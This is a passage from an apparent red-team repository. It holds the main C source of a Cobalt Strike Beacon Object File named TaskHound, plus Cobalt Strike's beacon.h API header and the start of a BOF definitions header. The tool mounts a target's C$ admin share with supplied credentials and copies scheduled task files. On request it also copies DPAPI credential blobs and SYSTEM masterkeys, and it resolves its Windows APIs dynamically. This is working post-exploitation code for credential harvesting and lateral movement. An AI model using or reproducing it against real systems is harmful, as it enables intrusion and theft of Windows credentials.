        if (file_size == 0 || file_size > 100000) {  // Skip very large files
            continue;
        }
        
        // Build full remote path
        if (!bof_strcpy_safe(full_path, remote_path, sizeof(full_path))) continue;
        if (!bof_strcat_safe(full_path, "\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User\\", sizeof(full_path))) continue;
        if (!bof_strcat_safe(full_path, findFileData.cFileName, sizeof(full_path))) continue;
        
        // Read the masterkey file
        HANDLE hFile = fpCreateFileA(full_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE) {
            continue;
        }
        
        // Allocate buffer for file content
        char* buffer = (char*)fpVirtualAlloc(NULL, file_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (!buffer) {
            fpCloseHandle(hFile);
            continue;
        }
        
        // Read file content
        DWORD bytes_read;
        if (!fpReadFile(hFile, buffer, file_size, &bytes_read, NULL) || bytes_read != file_size) {
            fpVirtualFree(buffer, 0, MEM_RELEASE);
            fpCloseHandle(hFile);
            continue;
        }
        fpCloseHandle(hFile);
        
        // Build save path
        if (!build_directory_path(save_path, masterkeys_dir, findFileData.cFileName, sizeof(save_path))) {
            fpVirtualFree(buffer, 0, MEM_RELEASE);
            continue;
        }
        
        // Write the masterkey file
        if (write_raw_file(save_path, buffer, file_size, fpCreateFileA, fpWriteFile, fpCloseHandle, fpGetLastError)) {
            masterkey_count++;
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Collected masterkey: %s (%d bytes)\n", findFileData.cFileName, file_size);
        }
        
        fpVirtualFree(buffer, 0, MEM_RELEASE);
        
    } while (fpFindNextFileA(hFind, &findFileData) != 0);
    
    fpFindClose(hFind);
    return masterkey_count;
}

// ============================================================================
// Main Entry Point
// ============================================================================

void go(char* args, int len) {
    datap parser;
    char* target;
    char* username;
    char* password;
    char* save_dir;
    char* flags;
    BOOL show_unsaved_creds = FALSE;
    BOOL grab_blobs = FALSE;
    char remote_path[512];
    NETRESOURCEA netResource;
    DWORD result;
    
    // Get API functions
    HMODULE hMpr = LoadLibraryA("mpr.dll");
    HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
    
    if (!hMpr || !hKernel32) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to load required libraries\n");
        return;
    }
    
    pWNetAddConnection2A fpWNetAddConnection2A = (pWNetAddConnection2A)GetProcAddress(hMpr, "WNetAddConnection2A");
    pWNetCancelConnection2A fpWNetCancelConnection2A = (pWNetCancelConnection2A)GetProcAddress(hMpr, "WNetCancelConnection2A");
    pFindFirstFileA fpFindFirstFileA = (pFindFirstFileA)GetProcAddress(hKernel32, "FindFirstFileA");
    pFindNextFileA fpFindNextFileA = (pFindNextFileA)GetProcAddress(hKernel32, "FindNextFileA");
    pFindClose fpFindClose = (pFindClose)GetProcAddress(hKernel32, "FindClose");
    pCreateFileA fpCreateFileA = (pCreateFileA)GetProcAddress(hKernel32, "CreateFileA");
    pReadFile fpReadFile = (pReadFile)GetProcAddress(hKernel32, "ReadFile");
    pCloseHandle fpCloseHandle = (pCloseHandle)GetProcAddress(hKernel32, "CloseHandle");
    pGetFileSize fpGetFileSize = (pGetFileSize)GetProcAddress(hKernel32, "GetFileSize");
    pVirtualAlloc fpVirtualAlloc = (pVirtualAlloc)GetProcAddress(hKernel32, "VirtualAlloc");
    pVirtualFree fpVirtualFree = (pVirtualFree)GetProcAddress(hKernel32, "VirtualFree");
    pWriteFile fpWriteFile = (pWriteFile)GetProcAddress(hKernel32, "WriteFile");
    pCreateDirectoryA fpCreateDirectoryA = (pCreateDirectoryA)GetProcAddress(hKernel32, "CreateDirectoryA");
    pGetLastError fpGetLastError = (pGetLastError)GetProcAddress(hKernel32, "GetLastError");
    
    // Check if all required functions are available
    if (!fpWNetAddConnection2A || !fpWNetCancelConnection2A || !fpFindFirstFileA || 
        !fpFindNextFileA || !fpFindClose || !fpCreateFileA || !fpReadFile || 
        !fpCloseHandle || !fpGetFileSize || !fpVirtualAlloc || !fpVirtualFree) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve required API functions\n");
        return;
    }
    
    // Parse arguments - Always expect 5 cstr parameters
    BeaconDataParse(&parser, args, len);
    
    target = BeaconDataExtract(&parser, NULL);
    username = BeaconDataExtract(&parser, NULL);
    password = BeaconDataExtract(&parser, NULL);
    save_dir = BeaconDataExtract(&parser, NULL);
    flags = BeaconDataExtract(&parser, NULL);
    
    // Validate required target
    if (!target || bof_strlen(target) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target hostname/IP is required\n");
        FreeLibrary(hMpr);
        return;
    }
    
    // Handle empty strings as NULL for optional parameters
    if (username && bof_strlen(username) == 0) username = NULL;
    if (password && bof_strlen(password) == 0) password = NULL;
    if (save_dir && bof_strlen(save_dir) == 0) save_dir = NULL;
    
    // Parse flags
    if (flags && bof_strlen(flags) > 0) {
        if (bof_strstr(flags, "-unsaved-creds")) {
            show_unsaved_creds = TRUE;
        }
        if (bof_strstr(flags, "-grab-blobs")) {
            grab_blobs = TRUE;
        }
    }
    
    // Check if write functions are available when save_dir is specified
    if (save_dir && (!fpWriteFile || !fpCreateDirectoryA)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve file write API functions\n");
        FreeLibrary(hMpr);
        return;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] TaskHound - Remote Task Collection\n");
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Target: %s\n", target);
    
    if (username) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Using credentials: %s\n", username);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Using current user context\n");
    }
    
    if (save_dir) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Save directory: %s\n", save_dir);
    }
    
    if (show_unsaved_creds) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Showing tasks without stored credentials\n");
    }
    
    if (grab_blobs) {
        if (save_dir) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Will collect credential blobs and masterkeys\n");
        } else {
            BeaconPrintf(CALLBACK_ERROR, "[-] Warning: -grab-blobs requires -save flag\n");
            grab_blobs = FALSE;
        }
    }
    
    // Setup network connection
    bof_memset(&netResource, 0, sizeof(NETRESOURCEA));
    netResource.dwType = RESOURCETYPE_DISK;
    netResource.dwDisplayType = RESOURCEDISPLAYTYPE_SHARE;
    netResource.dwUsage = RESOURCEUSAGE_CONNECTABLE;
    
    // Build UNC path for admin share
    if (!bof_strcpy_safe(remote_path, "\\\\", sizeof(remote_path))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to build remote path\n");
        FreeLibrary(hMpr);
        return;
    }
    if (!bof_strcat_safe(remote_path, target, sizeof(remote_path))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to build remote path\n");
        FreeLibrary(hMpr);
        return;
    }
    if (!bof_strcat_safe(remote_path, "\\C$", sizeof(remote_path))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to build remote path\n");
        FreeLibrary(hMpr);
        return;
    }
    netResource.lpRemoteName = remote_path;
    
    // Attempt to connect with provided credentials or current context
    result = fpWNetAddConnection2A(&netResource, password, username, 0);
    
    if (result != NO_ERROR) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to connect to %s (Error: %d)\n", remote_path, result);
        FreeLibrary(hMpr);
        return;
    }
    
    // Build base Tasks directory path
    char tasks_base_path[MAX_PATH_LENGTH];
    if (!bof_strcpy_safe(tasks_base_path, remote_path, sizeof(tasks_base_path)) ||
        !bof_strcat_safe(tasks_base_path, "\\Windows\\System32\\Tasks", sizeof(tasks_base_path))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to build Tasks directory path\n");
        fpWNetCancelConnection2A(remote_path, 0, TRUE);
        FreeLibrary(hMpr);
        return;
    }
    
    // Recursively traverse the Tasks directory and all subdirectories
    int task_count = traverse_task_directory(tasks_base_path, NULL, target, save_dir, show_unsaved_creds,
                                           fpFindFirstFileA, fpFindNextFileA, fpFindClose, 
                                           fpCreateFileA, fpReadFile, fpCloseHandle, fpGetFileSize,
                                           fpVirtualAlloc, fpVirtualFree, fpWriteFile, 
                                           fpCreateDirectoryA, fpGetLastError);
    
    // Collect credential blobs and masterkeys if requested
    int blob_count = 0;
    int masterkey_count = 0;
    
    if (grab_blobs && save_dir) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Collecting DPAPI files...\n");
        
        // Collect credential blobs
        blob_count = collect_credential_blobs(remote_path, target, save_dir,
                                             fpFindFirstFileA, fpFindNextFileA, fpFindClose,
                                             fpCreateFileA, fpReadFile, fpCloseHandle,
                                             fpGetFileSize, fpVirtualAlloc, fpVirtualFree,
                                             fpWriteFile, fpCreateDirectoryA, fpGetLastError);
        
        // Collect masterkeys
        masterkey_count = collect_masterkeys(remote_path, target, save_dir,
                                           fpFindFirstFileA, fpFindNextFileA, fpFindClose,
                                           fpCreateFileA, fpReadFile, fpCloseHandle,
                                           fpGetFileSize, fpVirtualAlloc, fpVirtualFree,
                                           fpWriteFile, fpCreateDirectoryA, fpGetLastError);
        
        BeaconPrintf(CALLBACK_OUTPUT, "[+] DPAPI collection complete: %d credential blobs, %d masterkeys\n", 
                    blob_count, masterkey_count);
    }
    
    // Clean up network connection
    fpWNetCancelConnection2A(remote_path, 0, TRUE);
    FreeLibrary(hMpr);
    
    BeaconPrintf(CALLBACK_OUTPUT, "\n[+] Collection complete. Found %d tasks", task_count);
    if (grab_blobs && save_dir) {
        BeaconPrintf(CALLBACK_OUTPUT, ", %d credential blobs, %d masterkeys\n", blob_count, masterkey_count);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "\n");
    }
}

================================================
FILE: _include/adaptix.h
================================================
#pragma once

#include "beacon.h"

DECLSPEC_IMPORT void AxAddScreenshot(char* note, char* data, int len);
DECLSPEC_IMPORT void AxDownloadMemory(char* filename, char* data, int len);


================================================
FILE: _include/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Additional BOF resources are available here:
 *   - https://github.com/Cobalt-Strike/bof_template
 *
 * Cobalt Strike 4.x
 * ChangeLog:
 *    1/25/2022: updated for 4.5
 *    7/18/2023: Added BeaconInformation API for 4.9
 *    7/31/2023: Added Key/Value store APIs for 4.9
 *                  BeaconAddValue, BeaconGetValue, and BeaconRemoveValue
 *    8/31/2023: Added Data store APIs for 4.9
 *                  BeaconDataStoreGetItem, BeaconDataStoreProtectItem,
 *                  BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries
 *    9/01/2023: Added BeaconGetCustomUserData API for 4.9
 *    3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL
 *               Updated the BEACON_INFO data structure to add new parameters
 *    4/19/2024: Added BeaconGetSyscallInformation API for 4.10
 *    4/25/2024: Added APIs to call Beacon's system call implementation
 *    12/18/2024: Updated BeaconGetSyscallInformation API for 4.11 (Breaking changes)
 *    2/13/2025: Updated SYSCALL_API structure with more ntAPIs for 4.11
 *    3/20/2025: Updated ALLOCATED_MEMORY_SECTION structure with driploader page size for 4.12
 *    4/7/2025: Updated ALLOCATED_MEMORY_REGION structure with driploader allocation granularity for 4.12
 *    7/16/2025: Updated ALLOCATED_MEMORY_PURPOSE structure with PURPOSE_UDC2_MEMORY for 4.12
 */
#ifndef _BEACON_H_
#define _BEACON_H_
#include <windows.h>

#ifdef __cplusplus
extern "C" {
#endif // __cplusplus

/* data API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, const char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, const char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_ERROR       0x0d
#define CALLBACK_CUSTOM      0x1000
#define CALLBACK_CUSTOM_LAST 0x13ff


DECLSPEC_IMPORT void   BeaconOutput(int type, const char * data, int len);
DECLSPEC_IMPORT void   BeaconPrintf(int type, const char * fmt, ...);
DECLSPEC_IMPORT BOOL   BeaconDownload(const char * filename, const char* buffer, unsigned int length);


/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

/* Beacon Information */
/*
 *  ptr  - pointer to the base address of the allocated memory.
 *  size - the number of bytes allocated for the ptr.
 */
typedef struct {
	char * ptr;
	size_t size;
} HEAP_RECORD;
#define MASK_SIZE 13

/* Information the user can set in the USER_DATA via a UDRL */
typedef enum {
	PURPOSE_EMPTY,
	PURPOSE_GENERIC_BUFFER,
	PURPOSE_BEACON_MEMORY,
	PURPOSE_SLEEPMASK_MEMORY,
	PURPOSE_BOF_MEMORY,
	PURPOSE_UDC2_MEMORY,
	PURPOSE_USER_DEFINED_MEMORY = 1000
} ALLOCATED_MEMORY_PURPOSE;

typedef enum {
	LABEL_EMPTY,
	LABEL_BUFFER,
	LABEL_PEHEADER,
	LABEL_TEXT,
	LABEL_RDATA,
	LABEL_DATA,
	LABEL_PDATA,
	LABEL_RELOC,
	LABEL_USER_DEFINED = 1000
} ALLOCATED_MEMORY_LABEL;

typedef enum {
	METHOD_UNKNOWN,
	METHOD_VIRTUALALLOC,
	METHOD_HEAPALLOC,
	METHOD_MODULESTOMP,
	METHOD_NTMAPVIEW,
	METHOD_USER_DEFINED = 1000,
} ALLOCATED_MEMORY_ALLOCATION_METHOD;

/**
* This structure allows the user to provide additional information
* about the allocated heap for cleanup. It is mandatory to provide
* the HeapHandle but the DestroyHeap Boolean can be used to indicate
* whether the clean up code should destroy the heap or simply free the pages.
* This is useful in situations where a loader allocates memory in the
* processes current heap.
*/
typedef struct _HEAPALLOC_INFO {
	PVOID HeapHandle;
	BOOL  DestroyHeap;
} HEAPALLOC_INFO, *PHEAPALLOC_INFO;

typedef struct _MODULESTOMP_INFO {
	HMODULE ModuleHandle;
} MODULESTOMP_INFO, *PMODULESTOMP_INFO;

typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION {
	HEAPALLOC_INFO HeapAllocInfo;
	MODULESTOMP_INFO ModuleStompInfo;
	PVOID Custom;
} ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION {
	BOOL Cleanup;
	ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod;
	ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation;
} ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_SECTION {
	ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development
	PVOID  BaseAddress;           // Pointer to virtual address of section
	SIZE_T VirtualSize;           // Virtual size of the section
	DWORD  CurrentProtect;        // Current memory protection of the section
	DWORD  PreviousProtect;       // The previous memory protection of the section (prior to masking/unmasking)
	BOOL   MaskSection;           // A boolean to indicate whether the section should be masked
	DWORD  DripLoadPageSize;      // The page size used when committing memory during drip-loading
} ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION;

typedef struct _ALLOCATED_MEMORY_REGION {
	ALLOCATED_MEMORY_PURPOSE Purpose;      // A label to indicate the purpose of the allocated memory
	PVOID  AllocationBase;                 // The base address of the allocated memory block
	SIZE_T RegionSize;                     // The size of the allocated memory block
	DWORD Type;                            // The type of memory allocated
	DWORD DripLoadAllocationGranularity;   // The allocation granularity used when reserving memory for drip-loading
	ALLOCATED_MEMORY_SECTION Sections[8];  // An array of section information structures
	ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation
} ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION;

typedef struct {
	ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6];
} ALLOCATED_MEMORY, *PALLOCATED_MEMORY;

/*
 *  version               - The version of the beacon dll was added for release 4.10
 *                          version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 *                          e.g. 0x040900 -> CS 4.9
 *                               0x041000 -> CS 4.10
 *
 *  sleep_mask_ptr        - pointer to the sleep mask base address
 *  sleep_mask_text_size  - the sleep mask text section size
 *  sleep_mask_total_size - the sleep mask total memory size
 *
 *  beacon_ptr   - pointer to beacon's base address
 *                 The stage.obfuscate flag affects this value when using CS default loader.
 *                    true:  beacon_ptr = allocated_buffer - 0x1000 (Not a valid address)
 *                    false: beacon_ptr = allocated_buffer (A valid address)
 *                 For a UDRL the beacon_ptr will be set to the 1st argument to DllMain
 *                 when the 2nd argument is set to DLL_PROCESS_ATTACH.
 *  heap_records - list of memory addresses on the heap beacon wants to mask.
 *                 The list is terminated by the HEAP_RECORD.ptr set to NULL.
 *  mask         - the mask that beacon randomly generated to apply
 *
 *  Added in version 4.10
 *  allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA
 *                     via a UDRL.
 */
typedef struct {
	unsigned int version;
	char  * sleep_mask_ptr;
	DWORD   sleep_mask_text_size;
	DWORD   sleep_mask_total_size;

	char  * beacon_ptr;
	HEAP_RECORD * heap_records;
	char    mask[MASK_SIZE];

	ALLOCATED_MEMORY allocatedMemory;
} BEACON_INFO, *PBEACON_INFO;

DECLSPEC_IMPORT BOOL   BeaconInformation(PBEACON_INFO info);

/* Key/Value store functions
 *    These functions are used to associate a key to a memory address and save
 *    that information into beacon.  These memory addresses can then be
 *    retrieved in a subsequent execution of a BOF.
 *
 *    key - the key will be converted to a hash which is used to locate the
 *          memory address.
 *
 *    ptr - a memory address to save.
 *
 * Considerations:
 *    - The contents at the memory address is not masked by beacon.
 *    - The contents at the memory address is not released by beacon.
 *
 */
DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr);
DECLSPEC_IMPORT void * BeaconGetValue(const char * key);
DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key);

/* Beacon Data Store functions
 *    These functions are used to access items in Beacon's Data Store.
 *    BeaconDataStoreGetItem returns NULL if the index does not exist.
 *
 *    The contents are masked by default, and BOFs must unprotect the entry
 *    before accessing the data buffer. BOFs must also protect the entry
 *    after the data is not used anymore.
 *
 */

#define DATA_STORE_TYPE_EMPTY 0
#define DATA_STORE_TYPE_GENERAL_FILE 1

typedef struct {
	int type;
	DWORD64 hash;
	BOOL masked;
	char* buffer;
	size_t length;
} DATA_STORE_OBJECT, *PDATA_STORE_OBJECT;

DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index);
DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries();

/* Beacon User Data functions */
DECLSPEC_IMPORT char * BeaconGetCustomUserData();

/* Beacon System call */
/* Syscalls API */
typedef struct
{
	PVOID fnAddr;
	PVOID jmpAddr;
	DWORD sysnum;
} SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY;

typedef struct
{
	SYSCALL_API_ENTRY ntAllocateVirtualMemory;
	SYSCALL_API_ENTRY ntProtectVirtualMemory;
	SYSCALL_API_ENTRY ntFreeVirtualMemory;
	SYSCALL_API_ENTRY ntGetContextThread;
	SYSCALL_API_ENTRY ntSetContextThread;
	SYSCALL_API_ENTRY ntResumeThread;
	SYSCALL_API_ENTRY ntCreateThreadEx;
	SYSCALL_API_ENTRY ntOpenProcess;
	SYSCALL_API_ENTRY ntOpenThread;
	SYSCALL_API_ENTRY ntClose;
	SYSCALL_API_ENTRY ntCreateSection;
	SYSCALL_API_ENTRY ntMapViewOfSection;
	SYSCALL_API_ENTRY ntUnmapViewOfSection;
	SYSCALL_API_ENTRY ntQueryVirtualMemory;
	SYSCALL_API_ENTRY ntDuplicateObject;
	SYSCALL_API_ENTRY ntReadVirtualMemory;
	SYSCALL_API_ENTRY ntWriteVirtualMemory;
	SYSCALL_API_ENTRY ntReadFile;
	SYSCALL_API_ENTRY ntWriteFile;
	SYSCALL_API_ENTRY ntCreateFile;
	SYSCALL_API_ENTRY ntQueueApcThread;
	SYSCALL_API_ENTRY ntCreateProcess;
	SYSCALL_API_ENTRY ntOpenProcessToken;
	SYSCALL_API_ENTRY ntTestAlert;
	SYSCALL_API_ENTRY ntSuspendProcess;
	SYSCALL_API_ENTRY ntResumeProcess;
	SYSCALL_API_ENTRY ntQuerySystemInformation;
	SYSCALL_API_ENTRY ntQueryDirectoryFile;
	SYSCALL_API_ENTRY ntSetInformationProcess;
	SYSCALL_API_ENTRY ntSetInformationThread;
	SYSCALL_API_ENTRY ntQueryInformationProcess;
	SYSCALL_API_ENTRY ntQueryInformationThread;
	SYSCALL_API_ENTRY ntOpenSection;
	SYSCALL_API_ENTRY ntAdjustPrivilegesToken;
	SYSCALL_API_ENTRY ntDeviceIoControlFile;
	SYSCALL_API_ENTRY ntWaitForMultipleObjects;
} SYSCALL_API, *PSYSCALL_API;

/* Additional Run Time Library (RTL) addresses used to support system calls.
 * If they are not set then system calls that require them will fall back
 * to the Standard Windows API.
 *
 * Required to support the following system calls:
 *    ntCreateFile
 */
typedef struct
{
	PVOID rtlDosPathNameToNtPathNameUWithStatusAddr;
	PVOID rtlFreeHeapAddr;
	PVOID rtlGetProcessHeapAddr;
} RTL_API, *PRTL_API;

/* Updated in version 4.11 to use the entire structure instead of pointers to the structure.
 * This allows for retrieving a copy of the information which would be under the BOF's
 * control instead of a reference pointer which may be obfuscated when beacon is sleeping.
 */
typedef struct
{
	SYSCALL_API syscalls;
	RTL_API     rtls;
} BEACON_SYSCALLS, *PBEACON_SYSCALLS;

/* Updated in version 4.11 to include the size of the info pointer, which equals sizeof(BEACON_SYSCALLS) */
DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, SIZE_T infoSize, BOOL resolveIfNotInitialized);

/* Beacon System call functions which will use the current system call method */
DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle);
DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId);
DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId);
DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object);
DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress);
DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length);
DECLSPEC_IMPORT BOOL BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);

/* Beacon Gate APIs */
DECLSPEC_IMPORT VOID BeaconDisableBeaconGate();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGate();

DECLSPEC_IMPORT VOID BeaconDisableBeaconGateMasking();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGateMasking();

/* Beacon User Data
 *
 * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 * e.g. 0x040900 -> CS 4.9
 *      0x041000 -> CS 4.10
*/

#define DLL_BEACON_USER_DATA 0x0d
#define BEACON_USER_DATA_CUSTOM_SIZE 32
typedef struct
{
	unsigned int version;
	PSYSCALL_API syscalls;
	char         custom[BEACON_USER_DATA_CUSTOM_SIZE];
	PRTL_API     rtls;
	PALLOCATED_MEMORY allocatedMemory;
} USER_DATA, * PUSER_DATA;

#ifdef __cplusplus
}
#endif // __cplusplus
#endif // _BEACON_H_


================================================
FILE: _include/bofdefs.h
================================================
#pragma once
#pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen)
#include <windows.h>
#include <process.h>
#include <winternl.h>
#include <imagehlp.h>
#include <iphlpapi.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <windns.h>
#include <dbghelp.h>
#include <winldap.h>
#include <winnetwk.h>
#include <wtsapi32.h>
#include <shlwapi.h>
#include <ntsecapi.h>
#include <aclapi.h>
#include <bcrypt.h>
#include <wincred.h>
#include <io.h>
#include <fcntl.h>
#include <inttypes.h>
#define SECURITY_WIN32
#include <sspi.h>
#include <secext.h>
#include <dsgetdc.h>

#ifndef WINBERAPI
#define WINBERAPI DECLSPEC_IMPORT
#endif
#ifndef BERAPI
#define BERAPI __cdecl
#endif

#define RTL_UPCASE(wch) (((wch) < 'a' ? (wch) : ((wch) <= 'z' ? (wch) - ('a'-'A') : ((WCHAR)(wch)))))
#define RTL_DOWNCASE(wch) (((wch) < 'A' ? (wch) : ((wch) <= 'Z' ? (wch) + ('a'-'A') : ((WCHAR)(wch)))))

#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_INHERIT 0x00000002L

#define STATUS_SUCCESS 0
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define STATUS_BUFFER_OVERFLOW 0x80000005L
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004

#define FILE_SHARE_READ 0x00000001
#define FILE_SHARE_VALID_FLAGS 0x00000007
#define FILE_OPEN 0x00000001
#define FILE_CREATE 0x00000002
#define FILE_OPEN_IF 0x00000003
#define FILE_OVERWRITE 0x00000004
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_WRITE_THROUGH 0x00000002
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_DIRECTORY_FILE   0x00000001
#define FILE_NON_DIRECTORY_FILE 0x00000040

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
#define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 )
#define NtCurrentSession() ( (HANDLE)(LONG_PTR) -3 )

typedef struct _SYSTEM_PROCESSES {
	ULONG NextEntryDelta;
	ULONG ThreadCount;
	ULONG Reserved1[6];
	LARGE_INTEGER CreateTime;
	LARGE_INTEGER UserTime;
